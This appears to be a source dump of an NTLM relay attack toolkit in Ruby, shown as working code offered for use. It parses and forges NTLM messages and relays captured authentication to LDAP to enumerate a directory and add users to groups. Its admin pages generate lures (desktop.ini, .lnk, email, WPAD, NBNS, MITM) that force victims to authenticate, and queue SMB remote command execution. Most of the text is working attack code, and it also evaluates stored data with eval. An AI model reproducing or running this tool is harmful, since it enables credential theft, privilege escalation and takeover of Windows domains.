.navbar-inner{padding-right:10px;padding-left:10px}}@media(min-width:980px){.nav-collapse.collapse{height:auto!important;overflow:visible!important}} 10 | -------------------------------------------------------------------------------- /lib/zfntlm.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | poc to decode ntlm responses 5 | =end 6 | domain = "TESTDOM2K8" 7 | #puts domain.upcase().unpack("C*").pack('v*').unpack('H*') 8 | #puts [domain.upcase().unpack("C*").pack('v*').length].pack('v').unpack('H*') 9 | 10 | module ZFNtlm 11 | class Message 12 | attr_accessor :type, :domain, :username, :lmhash, :ntlmhash,:hostname 13 | def initialize (msg="") 14 | @msg = msg 15 | if msg[0..7] != "\x4e\x54\x4c\x4d\x53\x53\x50\x00" then return false end 16 | if msg[8..11] == "\x01\x00\x00\x00" then @type = 1 17 | elsif msg[8..11] == "\x02\x00\x00\x00" then @type = 2 18 | elsif msg[8..11] == "\x03\x00\x00\x00" then @type = 3 19 | else return false end 20 | end 21 | def parsetype3(msg = @msg) 22 | if msg[0..7] != "\x4e\x54\x4c\x4d\x53\x53\x50\x00" then return false end 23 | if msg[8..11] != "\x03\x00\x00\x00" then return false end 24 | @type = 3 25 | lmlen = msg[12,2].unpack("S*")[0] 26 | lmoffset = msg[16,4].unpack("L*")[0] 27 | ntlmlen = msg[20,2].unpack("S*")[0] 28 | ntlmoffset = msg[24,4].unpack("L*")[0] 29 | domainnamelen = msg[28,2].unpack("S*")[0] 30 | domainnameoffset = msg[32,4].unpack("L*")[0] 31 | usernamelen = msg[36,2].unpack("S*")[0] 32 | usernameoffset = msg[40,4].unpack("L*")[0] 33 | hostnamelen = msg[44,2].unpack("S*")[0] 34 | hostnameoffset = msg[48,4].unpack("L*")[0] 35 | sessionkeylen = msg[52,2].unpack("S*")[0] 36 | sessionkeyoffset = msg[56,4].unpack("L*")[0] 37 | @flags = msg[60,4] 38 | @version = msg[64,8] 39 | @mic = msg[72,16] 40 | @domain = msg[domainnameoffset,domainnamelen].unpack("v*").map{|c|c.chr}.join 41 | @username = msg[usernameoffset,usernamelen].unpack("v*").map{|c|c.chr}.join 42 | @lmhash = msg[lmoffset,lmlen] 43 | @ntlmhash = msg[ntlmoffset,ntlmlen] 44 | @hostname = msg[hostnameoffset,hostnamelen].unpack("v*").map{|c|c.chr}.join 45 | @sessionkey = msg[sessionkeyoffset,sessionkeylen] 46 | 47 | end 48 | 49 | def buildtype3() 50 | domainname = @domain 51 | flgs = @flags 52 | username = @username 53 | hostname = @hostname 54 | sessionkey = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 55 | sessionkey = @sessionkey 56 | mic = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 57 | 58 | if @ntlmhash.length > 64 then #type2 msg find actual length 59 | @ntlmhmac = @ntlmhash[0,16] 60 | @ntlmheader = @ntlmhash[16,4] 61 | @ntlmreserved = @ntlmhash[20,4] 62 | @ntlmtime = @ntlmhash[24,8] 63 | @ntlmclientchal = @ntlmhash[32,8] 64 | @ntlmunknown = @ntlmhash[40,4] 65 | pos = 44 66 | ntlmhash = @ntlmhash[0,44] 67 | while pos < @ntlmhash.length 68 | type = @ntlmhash[pos,2] 69 | len = @ntlmhash[pos+2,2].unpack("S")[0] 70 | if type == "\x08\x00" || type == "\x0a\x00" || type == "\x09\x00" || type == "\x06\x00" then 71 | else 72 | 73 | ntlmhash = ntlmhash + @ntlmhash[pos,4+len] 74 | 75 | 76 | end 77 | pos = pos + len + 4 78 | end 79 | 80 | end 81 | 82 | 83 | packet = "\x4e\x54\x4c\x4d\x53\x53\x50\x00" + # NTLMSSP 84 | "\x03\x00\x00\x00" + # MSG Type 2 85 | [@lmhash.length].pack('v') + # 86 | [@lmhash.length].pack('v') + # 87 | [(88+username.length+domainname.length+hostname.length)].pack('L') + # UPDATE 88 | [ntlmhash.length].pack('v') + # 89 | [ntlmhash.length].pack('v') + # 90 | [(88+username.length+domainname.length+hostname.length+lmhash.length)].pack('L') + # UPDATE 91 | [domainname.length].pack('v') + # Domain Name Length 92 | [domainname.length].pack('v') + # Domain Name Max Len 93 | [88].pack("L") + # Domain Name Offset with 88 static size of header 94 | [username.length].pack('v') + 95 | [username.length].pack('v') + 96 | [(88+domainname.length)].pack("L") + # 97 | [hostname.length].pack('v') + 98 | [hostname.length].pack('v') + 99 | [(88+username.length+domainname.length)].pack('L') + 100 | [sessionkey.length].pack('v') + 101 | [sessionkey.length].pack('v') + 102 | [(88+username.length+domainname.length+hostname.length+@lmhash.length+ntlmhash.length)].pack('L') + 103 | @flags + # 4 bytes 104 | "\x06\x01\xb0\x1d\x00\x00\x00\x0f" + # NTLM Version 6.1 15 8 bytes 105 | mic + # 8 bytes 106 | domainname + 107 | username + 108 | hostname + 109 | @lmhash + 110 | ntlmhash + 111 | sessionkey 112 | return packet 113 | end 114 | def buildtype2(chal="\x11\x22\x33\x44\x55\x66\x77\x88",domainname="DOMAIN",hostname="HOSTNAME",domaindnsname="DOMAIN.TLD",serverdnsname="SERVER.DOMAIN.TLD") 115 | 116 | domainname = domainname.upcase.unpack("U*").pack("S*") 117 | hostname = hostname.upcase.unpack("U*").pack("S*") 118 | domaindnsname = domaindnsname.upcase.unpack("U*").pack("S*") 119 | serverdnsname = serverdnsname.upcase.unpack("U*").pack("S*") 120 | #flags = "\x15\x82\x89\x62" #TODO Add flag generation 121 | flags = "\x15\x82\x81\x62" #TODO Add flag generation 122 | @addresslist = "\x02\x00" + # Item - NetBios Domain Name 123 | [domainname.length].pack('v') + # Item Length 124 | domainname + # Domain Name (DOMAIN) 125 | "\x01\x00" + # Item - Net Bios Hostname 126 | [hostname.length].pack('v') + # Item Length 127 | hostname + # Hostname (HOSTNAME) 128 | "\x04\x00" + # Item Dns Domain Name 129 | [domaindnsname.length].pack('v') + # Item Length 130 | domaindnsname + # DNS Domain Name (domain.tld) 131 | "\x03\x00" + # DNS Host Name 132 | [serverdnsname.length].pack('v') + # Length 133 | serverdnsname + 134 | "\x00\x00\x00\x00" # End of List + 0 Length 135 | 136 | @default = "\x4e\x54\x4c\x4d\x53\x53\x50\x00" + # NTLMSSP 137 | "\x02\x00\x00\x00" + # MSG Type 2 138 | [domainname.length].pack('v') + # Domain Name Length 139 | [domainname.length].pack('v') + # Domain Name Max Len 140 | [56].pack("L") + # Domain Name Offset with 56 static size of header 141 | flags + # 4 bytes 142 | chal + # 8 bytes 143 | "\x00\x00\x00\x00\x00\x00\x00\x00" + # Reserved? 8 bytes 144 | [@addresslist.length].pack('v') + # Address List Length 2 bytes 145 | [@addresslist.length].pack('v') + #Address List Maxlen 2 bytes 146 | [(56+domainname.length)].pack("L") + # Address List Offset 4 bytes 147 | "\x06\x01\xb0\x1d\x00\x00\x00\x0f" + # NTLM Version 6.1 15 8 bytes 148 | domainname + 149 | @addresslist 150 | return @default 151 | end 152 | end 153 | end 154 | 155 | 156 | #a = ZFNtlm::Message.new() 157 | #a.buildtype2() 158 | 159 | class NTLMType2 160 | 161 | @type2data = "" 162 | def initialize(type2msg = "") 163 | @type2data = type2msg 164 | end 165 | def setdomain(domain) 166 | #puts domain.upcase().unpack("C*").pack('v*').unpack('H*') 167 | #puts [domain.upcase().unpack("C*").pack('v*').length].pack('v').unpack('H*') 168 | end 169 | def get() 170 | #return "\x4e\x54\x4c\x4d\x53\x53\x50\x00" + [@domain.length].pack("v") + [@domain.length].pack("v") + [(@domain.length + 30)].pack("v") + @chal + "\x00\x00\x00\x00\x00\x00\x00\x00" 171 | return "TlRMTVNTUAACAAAADAAMADAAAAAHAgOiESIzRFVmd4gAAAAAAAAAAGIAYgA8AAAARABPAE0AQQBJAE4AAgAMAEQATwBNAEEASQBOAAEADABTAEUAUgBWAEUAUgAEABYAZQB4AGEAbQBwAGwAZQAuAGMAbwBtAAMAJABTAEUAUgBWAEUAUgAuAGUAeABhAG0AcABsAGUALgBjAG8AbQAAAAAA" 172 | end 173 | end 174 | 175 | class NTLMType3 176 | def initialize(type3msg = "something") 177 | @t3msg = type3msg 178 | if (@t3msg[0,8] != "\x4e\x54\x4c\x4d\x53\x53\x50\x00") then raise "Type3 - Not NTLMSSP" end 179 | 180 | end 181 | 182 | rescue NTLMType3::Error 183 | puts "FAIL" 184 | end 185 | 186 | #a = NTLMType3.new 187 | 188 | #require './poc_relay_smb_ews_constants' 189 | 190 | #test2 = '4e544c4d5353500003000000180018008a0000007e017e01a200000014001400580000000c000c006c00000012001200780000001000100020020000150288e20601b01d0000000f3822ce610c0eeddf2e1bca357b5a0f14540045005300540044004f004d0032004b0038007a0066006100730065006c00570049004e0037005500530045005200310000000000000000000000000000000000000000000000000021d98b012b5ef3c249d2cb2aa82a0207010100000000000092214acb6e5dcd01e122cd5b3aa9fb3f0000000002001400540045005300540044004f004d0032004b00380001001000570049004e0032004b0038004400430004002a00740065007300740064006f006d0032006b0038002e007a0066006100730065006c002e006e006500740003003c00570069006e0032006b003800440043002e00740065007300740064006f006d0032006b0038002e007a0066006100730065006c002e006e006500740005002a00740065007300740064006f006d0032006b0038002e007a0066006100730065006c002e006e00650074000700080092214acb6e5dcd0106000400020000000800300030000000000000000000000000200000a1a4919aacc74f35c033582c72b7db8d73b4011bb3aa6df24aaf104199adc4280a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0031002e00310030002e0031003100000000000000000000000000ffb017067c1881f645406df717bcbb6e' 191 | #z = test2.scan(/../).map { | s| s.to_i(16) } 192 | #q = z.pack("C*") 193 | #test = ZFNtlm::Message.new(q) 194 | #test.parsetype3 195 | #woof = test.buildtype3.unpack("H*") 196 | 197 | #if (q[0,8] == "\x4e\x54\x4c\x4d\x53\x53\x50\x00") then puts "ntlmssp!" end 198 | #if (q[8,4] == "\x03\x00\x00\x00") then puts "Type3 Msg" end 199 | 200 | #print q[domainnameoffset,domainnamelen] 201 | #print "/" 202 | #puts q[usernameoffset,usernamelen] 203 | #print "NTHash: " 204 | #puts q[ntlmoffset,ntlmlen].unpack("H*")[0] 205 | #TODO : Add ntlmv2 decoding and modifying of data 206 | #flags = q[60,4] 207 | -------------------------------------------------------------------------------- /clients/ldap.rb: -------------------------------------------------------------------------------- 1 | #encoding: ASCII-8BIT 2 | require 'socket' 3 | 4 | module ZFClient 5 | class Ldap 6 | def initialize (server,port) 7 | puts "LDAP CLIENT GO" 8 | @db = ZFdb::DB.new 9 | @s = TCPSocket.open(server,port) 10 | end 11 | 12 | def sendtype1(type1msg) 13 | w = Ldappkt.new 14 | w.Buildfirst 15 | @s.write(w.Buildpacket) 16 | @q, x = @s.recvfrom(2000) 17 | w.Buildsecond 18 | @s.write(w.Buildpacket) 19 | @q, x = @s.recvfrom(2000) 20 | #debug cut 21 | puts "type 1" 22 | #puts type1msg[12,4].unpack("H*") 23 | #type1msg[12,4] = "\x97\x82\x08\xe2" 24 | #type1msg[12,4] = "\x97\x82\x08\xe2" 25 | #debug end 26 | w.BuildNTLM(1,type1msg) 27 | @s.write(w.Buildpacket) 28 | @q, x = @s.recvfrom(2000) 29 | ntlm = Ldappkt.ParseNTLM(@q) 30 | #debug cut 31 | puts "two" 32 | puts "packet:" 33 | puts @q.unpack("H*") 34 | puts "ntlm" 35 | puts ntlm.unpack("H*") 36 | puts "fail coming" 37 | puts ntlm[20,4].unpack("H*") 38 | #TODO FIX Above THIS!!!! 39 | puts "three" 40 | #ntlm[20,4] = "\x15\x82\x89\xe2" 41 | #ntlm[20,4] = "\x05\x82\x89\xe2" 42 | #debug end 43 | return ntlm 44 | end 45 | 46 | def sendtype3(type3msg, rawpkt, items=nil) 47 | w = Ldappkt.new 48 | w.BuildNTLM(3,type3msg) 49 | @s.write(w.Buildpacket) 50 | @q, x = @s.recvfrom(2000) 51 | begin 52 | w= Ldappkt.new 53 | w.FindBase 54 | @s.write(w.Buildpacket) 55 | @q, x = @s.recvfrom(2000) 56 | baseobj = w.ParseBaseDN(@q) #zfzf 57 | puts "baseobject!" 58 | puts baseobj 59 | actions = @db.GetActionItems(items["aid"]) 60 | actions.each do |act| 61 | if act[3] == 1 then #enum group 62 | group = (eval act[4])["group"] 63 | puts "group" 64 | puts group 65 | w.FindDN(baseobj, group,2) 66 | @s.write(w.Buildpacket) 67 | @q, x = @s.recvfrom(2000) 68 | groupdn = w.ParseSearchResult(@q) 69 | puts groupdn 70 | puts "groupa" 71 | elsif act[3] == 2 then #add user to group 72 | info = (eval act[4]) 73 | w.FindDN(baseobj, info["user"],1) 74 | @s.write(w.Buildpacket) 75 | @q, x = @s.recvfrom(2000) 76 | userdn = w.ParseSearchResult(@q) 77 | w.FindDN(baseobj, info["group"],2) 78 | @s.write(w.Buildpacket) 79 | @q, x = @s.recvfrom(2000) 80 | groupdn = w.ParseSearchResult(@q) 81 | w.AddUserToG(userdn,groupdn) 82 | @s.write(w.Buildpacket) 83 | @q, x = @s.recvfrom(2000) 84 | elsif act[3] == 10 then #pullallusersandgroups 85 | w.PullAllUsersAndGroups(baseobj) 86 | @s.write(w.Buildpacket) 87 | w.ParseLoop(@s) 88 | end 89 | end 90 | 91 | rescue 92 | puts $! 93 | end 94 | end 95 | 96 | 97 | end 98 | 99 | class Ldappkt 100 | attr_accessor :msgid 101 | def initialize(msg="") 102 | @msgid = 1 103 | if !(msg=="") then 104 | 105 | 106 | end 107 | end 108 | def self.ParseNTLM(msg) 109 | pos = msg.index(/\x4e\x54\x4c\x4d\x53\x53\x50/) 110 | puts "here it comes" 111 | if msg[pos-3,1] == "\x82" then puts "82" else puts "not 82" end 112 | if msg[pos-3,1] == "\x82" then len = msg[pos-2,2].unpack("n")[0] 113 | else len = msg[pos-1,1].unpack("C")[0] 114 | end 115 | puts len 116 | puts "length above" 117 | return msg[pos,len] 118 | end 119 | 120 | def Buildfirst() 121 | @reqcode = "\x63" 122 | build4 = "\x73\x75\x70\x70\x6f\x72\x74\x65\x64\x43\x61\x70\x61\x62\x69\x6c\x69\x74\x69\x65\x73" 123 | build3 = "\x04" + [build4.length].pack("C") + build4 124 | build2 = "\x00" + [build3.length].pack("C") + build3 125 | build = "\x04\x00" + # 126 | "\x0a\x01\x00" + # 127 | "\x0a\x01\x00" + # 128 | "\x02\x01\x00" + # 129 | "\x02\x01\x78" + #time limit 130 | "\x01\x01\x00" + #types only false 131 | "\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73" + # filter objectclass 132 | "\x30\x84" + # 133 | "\x00\x00" + build2 134 | @body = "\x84\x00\x00" + [build.length].pack("n") + build 135 | end 136 | 137 | def Buildsecond() 138 | @msgid = 2 139 | @reqcode = "\x63" 140 | build4 = "\x73\x75\x70\x70\x6f\x72\x74\x65\x64\x53\x41\x53\x4c\x4d\x65\x63\x68\x61\x6e\x69\x73\x6d\x73" 141 | #build2 = "\x00\x19\x04" + [build3.length].pack("C") + build3 142 | build3 = "\x04\x82" + [build4.length].pack("n") + build4 143 | build2 = "\x00\x19" + build3 144 | build = "\x04\x00" + # 145 | "\x0a\x01\x00" + # 146 | "\x0a\x01\x00" + # 147 | "\x02\x01\x00" + # 148 | "\x02\x01\x78" + # 149 | "\x01\x01\x00" + # 150 | "\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73" + # filter objectclass 151 | "\x30\x84" + # 152 | "\x00\x00" + build2 153 | @body = "\x84\x00\x00" + [build.length].pack("n") + build 154 | end 155 | def BuildNTLM(type, msg) 156 | @msgid = 3 157 | @reqcode = "\x60" 158 | 159 | 160 | build2 = "\x04\x0a" + "\x47\x53\x53\x2d\x53\x50\x4e\x45\x47\x4f" + "\x04\x82" + [msg.length].pack("n") + msg 161 | 162 | build = "\x02\x01" + 163 | "\x03\x04" + 164 | "\x00" + 165 | "\xa3\x84\x00\x00" + [build2.length].pack("n") + build2 166 | @body = "\x84\x00\x00" + [build.length].pack("n") + build 167 | end 168 | def FindBase() 169 | # lazy again. here's the raw packet. Runing short on time. 170 | @msgid = 4 171 | @reqcode = "\x63" 172 | @body = "\x39\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x19\x04\x17\x72\x6f\x6f\x74\x44\x6f\x6d\x61\x69\x6e\x4e\x61\x6d\x69\x6e\x67\x43\x6f\x6e\x74\x65\x78\x74" 173 | end 174 | def FindDN(baseobj, name, type=1) 175 | @reqcode = "\x63" 176 | filter1desc = "objectclass" 177 | if type == 1 then 178 | filter1value = "user" 179 | elsif type ==2 then 180 | filter1value= "group" 181 | end 182 | filter2desc = "sAMAccountName" 183 | filter2value = name 184 | 185 | filter1b = "\x04" + [filter1desc.length].pack("C") + filter1desc + "\x04" + [filter1value.length].pack("C") + filter1value 186 | filter1 = "\xa3" + [filter1b.length].pack("C") + filter1b 187 | filter2b = "\x04" + [filter2desc.length].pack("C") + filter2desc + "\x04" + [filter2value.length].pack("C") + filter2value 188 | filter2 = "\xa3" + [filter2b.length].pack("C") + filter1b 189 | attributes = "dn" 190 | build = "\x04\x82" + [attributes.length].pack("n") + attributes 191 | build = "\x30" + [build.length].pack("C") + build 192 | filter = "\xa3\x82" + [filter1b.length].pack("n") + filter1b + "\xa3\x82" + [filter2b.length].pack("n") + filter2b 193 | build = "\x04\x82" + [baseobj.length].pack("n") + baseobj + "\x0a\x01\x02\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00" + "\xa0" + 194 | [filter.length].pack("C") + filter + build 195 | @body = "\x82" + [build.length].pack("n") + build 196 | end 197 | def PullAllUsersAndGroups(baseobj, attributes=nil) 198 | @reqcode = "\x63" 199 | filter1desc = "objectclass" 200 | filter1value = "user" 201 | filter2desc = "objectclass" 202 | filter2value = "group" 203 | 204 | filter1b = "\x04" + [filter1desc.length].pack("C") + filter1desc + "\x04" + [filter1value.length].pack("C") + filter1value 205 | filter2b = "\x04" + [filter2desc.length].pack("C") + filter2desc + "\x04" + [filter2value.length].pack("C") + filter2value 206 | attributes = ["sAMAccountName","member","memberOf","objectGUID"] 207 | build = "" 208 | attributes.each do |woof| 209 | build = build + "\x04" + [woof.length].pack("C") + woof 210 | end 211 | build = "\x30" + #attribute list 212 | "\x82" + [build.length].pack("n") + build 213 | filter = "\xa3" + #item 214 | "\x82" + [filter1b.length].pack("n") + filter1b + "\xa3" + "\x82" + [filter2b.length].pack("n") + filter2b 215 | build = "\x04" + "\x82" + [baseobj.length].pack("n") + baseobj + 216 | "\x0a\x01" + "\x02" + "\x0a\x01" + "\x00" + "\x02\x01" + "\x00" + "\x02\x01" + "\x00" + "\x01\x01" + "\x00" + 217 | #"\xa0" + #AND 218 | "\xa1" + #OR 219 | #"\xa3" + #item 220 | #"\xa2" + #NOT 221 | [filter.length].pack("C") + filter + build 222 | @body = "\x82" + [build.length].pack("n") + build 223 | end 224 | def ParseSearchResult(q) 225 | #TODO actual parsing instead of gheto parsing 226 | pos = q.index(/\x43\x4e\x3d/) 227 | len = q[pos-1,1].unpack("C") 228 | return q[pos,len[0]] 229 | end 230 | def ParseLoop(s) 231 | notdone = true 232 | while (notdone) 233 | cpos = pos = 0 234 | q = "" 235 | while (d = s.recvfrom(2000)) 236 | q = q + d[0] 237 | if (d[0].length<2000) then break end 238 | end 239 | while (pos < q.length) 240 | len = q[pos+2,4].unpack("N")[0] 241 | cpos=pos 242 | pos = pos + 6 + len 243 | if (q[cpos+9] == "\x64") then 244 | #puts "pos: " + pos.to_s + " / len: " + len.to_s 245 | ilen = q[cpos+16].unpack("C")[0] 246 | #puts "DN is " + q[cpos+17,ilen] 247 | cpos = cpos+17+ilen+6 248 | while cpos < pos-1 #each attribute in list 249 | alen = q[cpos+2,4].unpack("N")[0] 250 | apos = cpos+6 251 | cpos = cpos+alen+6 252 | tlen = q[apos+1,1].unpack("C")[0] 253 | #puts " " + q[apos+2,tlen] 254 | apos = apos + tlen + 8 255 | while apos < cpos 256 | ilen = q[apos+1,1].unpack("C")[0] 257 | #puts " - " + q[apos+2,ilen] 258 | apos = apos+2+ilen 259 | end 260 | 261 | 262 | 263 | end 264 | elsif (q[cpos+9] == "\x65") then 265 | notdone = false 266 | puts "DONE" 267 | end 268 | 269 | end 270 | q = nil 271 | end 272 | end 273 | def ParseBaseDN(q) 274 | #TODO ACTUAL PARSING FOR FUCKS SAKE 275 | pos = q.index(/\x44\x43\x3d/) 276 | len = q[pos-1,1].unpack("C") 277 | return q[pos,len[0]] 278 | end 279 | def AddUserToG(userdn,groupdn) 280 | @reqcode = "\x66" 281 | add = "member" 282 | @msgid = 4 283 | build = "\x04" + "\x82"+[userdn.length].pack("n") + userdn 284 | build = "\x04\x82" + [add.length].pack("n") + add + 285 | "\x31\x82" + [build.length].pack("n") + build 286 | build = "\x0a\x01\x00" + "\x30" + "\x82" + [build.length].pack("n") + build 287 | build = "\x30" + "\x82" + [build.length].pack("n") + build 288 | build = "\x04\x82" + [groupdn.length].pack("n") + groupdn + "\x30" + "\x82" + [build.length].pack("n") + build 289 | @body = "\x82" + [build.length].pack("n") + build 290 | end 291 | def Buildpacket() 292 | build = "\x02\x01" + [@msgid].pack("C") + @reqcode + @body 293 | packet = "\x30\x82" + [build.length].pack("n") + build 294 | return packet 295 | end 296 | #to be deleted - not sure why it exists 297 | # def Buildpacket2() 298 | # build = "\x02\x01" + [@msgid].pack("C") + @reqcode + @body 299 | # packet = "\x30\x82" + [build.length].pack("n") + build 300 | # return packet 301 | # end 302 | end 303 | 304 | end 305 | -------------------------------------------------------------------------------- /bootstrap/payloads.erb: -------------------------------------------------------------------------------- 1 | <%if servlet_request.query["action"] == "desktopini" then%> 2 | <%=ZFPayload::Desktopini.build(servlet_request.query["ip"],servlet_request.query["path"],servlet_request.query["filename"])%> 3 | <%elsif servlet_request.query["action"] == "html" then%> 4 | 5 | <%else%> 6 | <%=ZFadmingui.Header%> 7 | 8 |
    9 | 10 | <%#=ZFadmingui.Leftbar%> 11 |
    12 |
    13 | 14 |
    15 |
    16 |

    .html Generator

    17 |

    Creates the HTML files for detecting user's OS and utilizing one of three methods to force browser to auto-auth.

    18 | 19 |

    View details »

    20 |
    21 |
    22 |

    Desktop.ini

    23 |

    Creates desktop.ini file for upload to shared folder, placement on USB thumb drive or CD, or other methods of deployment.

    24 |

    View details »

    25 |
    26 |
    27 |

    .doc Generator

    28 |

    Injection of UNC path into word .doc file (simply an HTML file for now :P).

    29 |

    View details »

    30 |
    31 |
    32 |
    33 |
    34 |

    eMail Generator

    35 |

    Creates email with HTML content containing a UNC img path. Options allow attachment of .doc and/or .html

    36 |

    View details »

    37 |
    38 |
    39 |

    .lnk Shortcut

    40 |

    Similar to desktop.ini files, .lnk files can have their icon set to be a unc network path.

    41 |

    View details »

    42 |
    43 |
    44 |

    WSUS / Vuln Scanners

    45 |

    Automated Scanners may commonly authenticate to the SMB service of it's scan range to enumerate the system info.

    46 |

    View details »

    47 |
    48 |
    49 |
    50 |
    51 |

    WPAD

    52 |

    Respond to searches for Web Proxy Auto Detect (WPAD)

    53 |

    View details »

    54 |
    55 |
    56 |

    MITM w/ DHCP or ARP

    57 |

    Inject UNC paths into network traffic using MITM attacks such as ARP Spoofing / Rogue DHCP Servers

    58 |

    View details »

    59 |
    60 |
    61 |

    NBNS

    62 |

    NBNS' broadcast name lookups can redirect connection requests to the rogue servers.

    63 |

    View details »

    64 |
    65 |
    66 |
    67 |
    68 |

    Quicktime

    69 |

    The quicktime plugin will auto connect to UNC paths of items in a playlist

    70 |

    View details »

    71 |
    72 |
    73 |
    74 | 75 | 102 | 103 | 128 | 129 | 151 | 152 | 153 | 164 | 165 | 166 | 187 | 188 | 198 | 199 | 200 | 213 | 214 | 215 | 226 | 227 | 228 | 241 | 242 | 243 | 254 | 255 | <%=ZFadmingui.Footer%> 256 | <%end%> 257 | -------------------------------------------------------------------------------- /bootstrap/rules.erb: -------------------------------------------------------------------------------- 1 | <% 2 | db = ZFdb::DB.new() 3 | if servlet_request.query["action"] == "target" then 4 | if !(servlet_request.query["tname"]=="" || servlet_request.query["tipaddr"] == "") then 5 | db.GetTargetId(servlet_request.query["tipaddr"],servlet_request.query["tname"]) 6 | end 7 | elsif servlet_request.query["action"] == "tgroupmember" then 8 | if !(servlet_request.query["tgname"]=="" || servlet_request.query["tipaddr"] == "") then 9 | tgid = db.GetTgroupID(servlet_request.query["tgname"]) 10 | tid = db.GetTargetId(servlet_request.query["tipaddr"],servlet_request.query["tipaddr"]) 11 | db.AddTargetToTgroup(tid,tgid) 12 | end 13 | elsif servlet_request.query["action"] == "delfromtg" then 14 | db.DelTargetFromTgroup(servlet_request.query["tid"],servlet_request.query["tgid"]) 15 | elsif servlet_request.query["action"] == "action" then 16 | if !(servlet_request.query["tgname"]=="" || servlet_request.query["group"]=="" || servlet_request.query["amoduleid"]=="" ) then 17 | if servlet_request.query["alltargets"] == "1" then alltargets=1 else alltargets=0 end 18 | if servlet_request.query["allusers"] == "1" then allusers=1 else allusers=0 end 19 | aid = db.NewAction("aname","anotes",servlet_request.query["amoduleid"],alltargets,allusers,50) 20 | tgid = db.GetTgroupID(servlet_request.query["tgname"]) 21 | db.AddTgroupToAction(tgid,aid) 22 | gid = db.GetGroupID(servlet_request.query["group"]) 23 | db.AddGroupToAction(gid,aid) 24 | end 25 | elsif servlet_request.query["action"] == "delaction" then 26 | db.DeleteAction(servlet_request.query["aid"]) 27 | elsif servlet_request.query["action"] == "delaitem" then 28 | db.DeleteActionItem(servlet_request.query["aitemid"]) 29 | elsif servlet_request.query["action"] == "addaitem" then 30 | if servlet_request.query["aewsfolderstock"] == "" then 31 | folder = servlet_request.query["aewsfolder"] 32 | else 33 | folder = servlet_request.query["aewsfolderstock"] 34 | end 35 | db.NewActionItem(servlet_request.query["aaid"],servlet_request.query["aamoduleid"],1,{"folder" => folder}.inspect) 36 | elsif servlet_request.query["action"] == "smbenum" then #enum users in group 37 | group = servlet_request.query["group"] 38 | db.NewActionItem(servlet_request.query["aaid"],2,1,{"group" => group}.inspect) 39 | elsif servlet_request.query["action"] == "smbexec" then #enum users in group 40 | cmd = servlet_request.query["cmd"] 41 | db.NewActionItem(servlet_request.query["aaid"],2,2,{"cmd" => cmd}.inspect) 42 | elsif servlet_request.query["action"] == "ldapenum" then #enum users in group 43 | group = servlet_request.query["group"] 44 | db.NewActionItem(servlet_request.query["aaid"],3,1,{"group" => group}.inspect) 45 | elsif servlet_request.query["action"] == "ldapaddutog" then #enum users in group. 46 | group = servlet_request.query["group"] 47 | user = servlet_request.query["user"] 48 | db.NewActionItem(servlet_request.query["aaid"],3,2,{"group" => group, "user" => user}.inspect) 49 | elsif servlet_request.query["action"] == "ldapenumall" then 50 | db.NewActionItem(servlet_request.query["aaid"],3,10,{"all" => "all"}.inspect) 51 | end 52 | #delfromtg 53 | #catch nulls 54 | %> 55 | <%= ZFadmingui.Header%> 56 | 57 |
    58 | <%= ZFadmingui.Leftbar%> 59 |
    60 |
    61 |
    62 |

    Now for the Juicy Stuff :)

    63 |

    64 | This is a new level of relaying NTLM authentication requets 65 |

    66 |
    67 | 68 |
    69 |
    70 |

    Actions:

    71 |
    72 |
    73 | 74 | 76 | --> 77 | 86 | --> 87 | 89 | --> --> --> 94 | 95 |
    96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | <%db.GetActions.each do |act|%> 104 | 105 | 140 | 141 | <%end%> 142 | 143 |
    aIDif user groupthen use this moduleto these targetsand perform these actionsrepeated to
    <%= act[0]%><%db.GetActionsUGroup(act[0]).each do |ug| %><%= ug[1]%> 106 |
    107 | <%end%>    		<%= mods[act[4]]%><%db.GetActionsTGroup(act[0]).each do |tg|%><%= tg[1]%> 108 |
    109 | <%end%>    		 <%aitems = db.GetActionItems(act[0]) 110 | i=1 111 | aitems.each do |ffs| 112 | deets = eval ffs[4] 113 | %> 114 | <%= if ffs[5] == 1 then #ews 115 | if ffs[3] == 1 then #download emails from folder 116 | "Pull Emails - folder=" + deets["folder"].to_s 117 | else "EWS Undefined Action" 118 | end 119 | elsif ffs[5] == 2 then #smb 120 | if ffs[3] == 1 then #enum users 121 | "Enum Users from Group '" + deets["group"].to_s + "'" 122 | elsif ffs[3] == 2 then #exec cmd 123 | "Execute Command '" + deets["cmd"].to_s + "'" 124 | else "SMB Undefined Action" 125 | end 126 | elsif ffs[5] == 3 then #ldap 127 | if ffs[3] == 1 then #enum users 128 | "Enum Users from Group '" + deets["group"].to_s + "'" 129 | elsif ffs[3] == 2 then #add user to group 130 | "Add User '" + deets["user"].to_s + "' to group '" + deets["group"].to_s + "'" 131 | elsif ffs[3] == 10 then 132 | "Enum All users and Groups!" 133 | else "LDAP Undefined Action" 134 | end 135 | end 136 | %> <%if i!=aitems.length then%> 137 |
    138 | <%i = i+1 end%> 139 | <%end%>     		<%= if act[5]==1 && act[6]==1 then "All Users & Targets" elsif act[6]==1 then "All Users" elsif act[5]==1 then "All Targets" end%>
    144 |
    145 |
    146 |
    147 |
    148 |
    149 |
    150 |
    151 |
    152 |

    Targets:

    153 |
    154 |
    155 | 156 | 157 | -> 158 | 159 | 160 |
    161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | <%db.GetTargets.each do |tres|%> 169 | 170 | 171 | 172 | <%end%> 173 | 174 |
    tIDTarget NameTarget IP
    <%= tres[0]%><%= tres[1]%><%= tres[2]%>
    175 |
    176 | 177 |
    178 |

    Target Groups:

    179 |
    180 |
    181 | 182 | 183 | -> 184 | 186 | 187 |
    188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | <%db.GetTGroups.each do |tgroups| %> 196 | 197 | 200 | 201 | <%end%> 202 | 203 |
